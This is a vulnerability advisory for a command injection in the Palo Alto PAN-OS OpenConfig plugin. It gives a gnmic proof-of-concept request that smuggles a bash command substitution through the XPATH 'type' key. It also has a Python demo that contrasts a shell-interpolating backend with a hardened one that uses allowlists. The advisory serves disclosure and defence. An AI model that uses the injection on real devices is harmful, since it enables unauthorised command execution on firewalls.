PaloAlto OpenConfig Plugin: Command Injection Vulnerability
A high-severity vulnerability in the Palo Alto PAN-OS OpenConfig component allows an authenticated user to execute arbitrary bash commands with device-administrator privileges. It is triggered by sending a malicious parameter through the OpenConfig API. Affected versions: < 2.1.2; fixed. 2025-02-19 00:00:59 Author: github.com

Package

OpenConfig (PaloAlto OS)

Affected versions

< 2.1.2

Patched versions

>= 2.1.2

Summary

A vulnerability in PAN-OS OpenConfig allows an authenticated user to run arbitrary commands on the underlying OS. The commands are run as device administrator.

Details

Palo Alto Networks firewalls allow syslog retrieval through gnmi.Subscribe. With the OpenConfig plugin installed, the following OpenConfig API path can be queried, with the query parameters carried as XPATH keys:

pan-logging:/pan/logging/query/custom[type=system][direction=fwd][max_logs=2][period=last-24-hrs]

We found that the value of the type parameter in the XPATH above is handed to a shell, so it can carry arbitrary bash commands that are executed on the firewall.

Severity

High - This vulnerability allows an authenticated attacker to run arbitrary bash commands via gnmi.Subscribe.

Proof of Concept

To exploit this vulnerability, we crafted a request whose type parameter is a bash command substitution that writes the string "system" to a file and reads it back. Because system is a valid type value, the query still succeeds once the substitution has run, which makes the command execution observable in the response.

XPATH

/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]

Request

We used the gnmic tool to send the request.

./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \
-e json_ietf subscribe --mode once --log \
--path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]' 

Response

{
  "source": "<IP>:<PORT>",
  "subscription-name": "<>",
  "timestamp": <>,
  "time": "<>",
  "updates": [
    {
      "Path": "/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system \u003e file1; cat file1)]",
      "values": {
        "/pan/logging/query/custom": {
          "code": "200",
          "message": {
...

system is a valid value for the type parameter. The response above (code 200) shows that the server executed the bash commands echo system > file1; cat file1: the substitution produced the output system, which was then used as the value of the type parameter and accepted by the query.
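The following Python example is added here and is not part of the original advisory or of PAN-OS. It models the mechanism behind both the Details section and the PoC above: a hypothetical backend that interpolates the XPATH key values into a shell command line (echo stands in for the real log-query program, and the allowlists are assumptions; the page only confirms that system is a valid type) is run against the exact PoC XPATH, beside a hardened variant that allowlists each key and executes without a shell.

```python
"""
Added example (not PAN-OS or google/security-research code): a minimal model
of the injection described above. A hypothetical log-query backend splices
the XPATH key values into a shell command line; the PoC value for `type` is
a command substitution that the shell evaluates before the query runs. The
hardened variant allowlists each key and executes with no shell at all.
"""
import re
import subprocess
import tempfile
from pathlib import Path

# Matches [key=value] pairs of a gNMI path element, e.g. [type=system].
# Assumption: values do not contain an escaped ']' (true for the PoC path).
KEY_RE = re.compile(r"\[([^=\]]+)=([^\]]*)\]")

# Hypothetical allowlists; the page only confirms that "system" is a valid type.
ALLOWED_TYPES = {"system", "traffic", "threat", "config"}
ALLOWED_DIRECTIONS = {"fwd", "bwd"}
PERIOD_RE = re.compile(r"^last-\d+-(hrs|days)$")

# The exact XPATH used in the PoC above.
POC_PATH = ("pan-logging:/pan/logging/query/custom"
            "[type=$(echo system > file1; cat file1)]"
            "[direction=fwd][max_logs=2][period=last-24-hrs]")


def parse_keys(path: str) -> dict:
    """Return the [key=value] pairs of a gNMI path as a dict (values verbatim)."""
    return dict(KEY_RE.findall(path))


def vulnerable_command(keys: dict) -> str:
    """Hypothetical vulnerable backend: raw string interpolation into a shell line.
    `echo` stands in for the real log-query binary so the example runs anywhere."""
    return ("echo querying logs type={type} direction={direction} "
            "max={max_logs} period={period}").format(**keys)


def run_vulnerable(path: str) -> tuple:
    """Run the interpolated line through /bin/sh in a scratch directory.
    Returns (stdout, True if the injected payload created file1)."""
    keys = parse_keys(path)
    with tempfile.TemporaryDirectory() as cwd:
        proc = subprocess.run(vulnerable_command(keys), shell=True, cwd=cwd,
                              capture_output=True, text=True)
        created = (Path(cwd) / "file1").exists()
    return proc.stdout.strip(), created


def validate(keys: dict) -> dict:
    """Reject any key value outside its allowlist; never trust the XPATH."""
    if keys.get("type") not in ALLOWED_TYPES:
        raise ValueError(f"bad type: {keys.get('type')!r}")
    if keys.get("direction") not in ALLOWED_DIRECTIONS:
        raise ValueError(f"bad direction: {keys.get('direction')!r}")
    max_logs = keys.get("max_logs", "")
    if not max_logs.isdigit() or not 1 <= int(max_logs) <= 10000:
        raise ValueError(f"bad max_logs: {max_logs!r}")
    if not PERIOD_RE.match(keys.get("period", "")):
        raise ValueError(f"bad period: {keys.get('period')!r}")
    return keys


def run_hardened(path: str) -> tuple:
    """Allowlist every key, then exec with an argv list and no shell, so even a
    value that slipped through validation is passed verbatim, never evaluated."""
    keys = validate(parse_keys(path))
    argv = ["echo", "querying", "logs", f"type={keys['type']}",
            f"direction={keys['direction']}", f"max={keys['max_logs']}",
            f"period={keys['period']}"]
    with tempfile.TemporaryDirectory() as cwd:
        proc = subprocess.run(argv, cwd=cwd, capture_output=True, text=True)
        created = (Path(cwd) / "file1").exists()
    return proc.stdout.strip(), created


def hardened_rejects(path: str) -> bool:
    """True if the hardened backend refuses the request before executing anything."""
    try:
        run_hardened(path)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable(POC_PATH))
    print("hardened rejects PoC:", hardened_rejects(POC_PATH))
    print("hardened, valid request:",
          run_hardened(POC_PATH.replace("$(echo system > file1; cat file1)", "system")))
```

Running the block shows the vulnerable path returning type=system while file1 appears in the scratch directory, the same side effect the response above demonstrates, whereas the hardened path refuses the PoC request outright and, for a valid request, never lets a shell see the values at all.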

Preconditions

The OpenConfig plugin must be installed on the firewall to run the above exploit.

Further Analysis

Details of this CVE can be found at: https://security.paloaltonetworks.com/CVE-2025-0110

Timeline

Date reported: 10/17/2024
Date fixed: 01/14/2025
Date disclosed: 02/19/2025


Source: https://github.com/google/security-research/security/advisories/GHSA-73px-m3vw-mr35